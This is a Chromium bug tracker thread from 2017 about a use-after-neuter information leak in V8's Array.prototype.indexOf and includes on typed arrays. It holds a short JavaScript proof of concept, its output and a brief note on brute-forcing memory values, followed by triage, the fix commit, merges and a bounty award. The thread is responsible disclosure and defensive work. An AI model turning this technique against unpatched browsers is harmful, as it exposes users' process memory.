Issue metadata
Sign in to add a comment
|
Security: Information Leak in Array indexOf
Reported by
cwhan.t...@gmail.com,
Feb 12 2017
|
||||||||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS This vulnerability occurs in the following two functions: - Array.prototype.indexOf(arr, elem, from_index); - Array.prototype.includes(arr, elem, from_index); I'll describe only indexOf since two vulnerabilities occurs in the similar process. Summary: In the process of Array.indexOf, properties of arr can be changed. In runtime-array.cc, 1. it checks the length of the target array first (https://chromium.googlesource.com/v8/v8/+/5.6.326.50/src/runtime/runtime-array.cc#574). 2. from_index is converted to integer by calling Object::ToInteger (https://chromium.googlesource.com/v8/v8/+/5.6.326.50/src/runtime/runtime-array.cc#586). 3. Iterate elements using the length calculated in 1. In the step 2, the length of the target array can be changed (or any properties can be changed). If we pass a typed array to the `arr`, and if we neuter arr.buffer in the step 2. Then, step 3 search in freed elements. VERSION v8 5.6.326.50 32bit version I tested it in Ubuntu 14.04.3 64bit, and compiled v8 to ia32.release. REPRODUCTION CASE For simplicity, I used ArrayBufferNeuter native function. ================ test.js ================== // flags: --allow-natives-syntax var buf = new ArrayBuffer(0x10000); var arr2 = new Uint8Array(buf).fill(55); var tmp = {}; tmp[Symbol.toPrimitive] = function () { %ArrayBufferNeuter(arr2.buffer) var arr3 = new Uint8Array(0x800).fill(0xfc); return 0; }; print(Array.prototype.indexOf.call(arr2, 0x00, tmp)); ========================================== $ ./out/ia32.release/d8 --allow-natives-syntax ./test_arrindex.js 10 Since we filled the typedarray to 55, it has to print -1. But, in my machine, it prints 10 as an output. It searched freed elements, and found the position of null! If we use Uint8Array for brute-force, we can easily guess values in memories.
,
Feb 13 2017
+yangguo@, could you help triage this issue? Feel free to re-assign owner
,
Feb 13 2017
Seems rather serious at first glance.
,
Feb 13 2017
,
Feb 13 2017
,
Feb 13 2017
Assigning to cbruni@ for investigation: It seems that the IndexOfValueImpl for TypedArrays is missing a neutering check.
,
Feb 13 2017
,
Feb 13 2017
,
Feb 13 2017
,
Feb 13 2017
,
Feb 20 2017
[elements] Check if the backing store has been neutered for indexOf BUG= 691323 Change-Id: I84f2c90355982567c421639e115745eadd5fcb21 Reviewed-on: https://chromium-review.googlesource.com/441964 Reviewed-by: Caitlin Potter <caitp@igalia.com> Reviewed-by: Camillo Bruni <cbruni@chromium.org> Commit-Queue: Camillo Bruni <cbruni@chromium.org> Cr-Commit-Position: refs/heads/master@{#43279}
,
Feb 20 2017
,
Feb 20 2017
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Feb 20 2017
,
Feb 20 2017
,
Feb 21 2017
,
Feb 21 2017
,
Feb 21 2017
If possible, Please merge your change to M57 branch 2987 by 5:00 PM PT today, Tuesday (02/21) so we can pick it up for this week beta release. Thank you.
,
Feb 22 2017
,
Feb 24 2017
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Feb 24 2017
Merged to v8 5.7 branch as https://crrev.com/9dae47c8dade7216f624ab4487e610faf90c2237
,
Feb 25 2017
,
Feb 27 2017
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Feb 28 2017
,
Feb 28 2017
Congratulations! The panel decided to award $2,000 for this bug!
,
Feb 28 2017
,
Mar 3 2017
,
Mar 6 2017
,
Mar 6 2017
,
Mar 6 2017
,
Mar 8 2017
,
May 30 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 25 2018
,
Jul 28
|
|||||||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||||||
Comment 1 by jialiul@chromium.org
, Feb 12 2017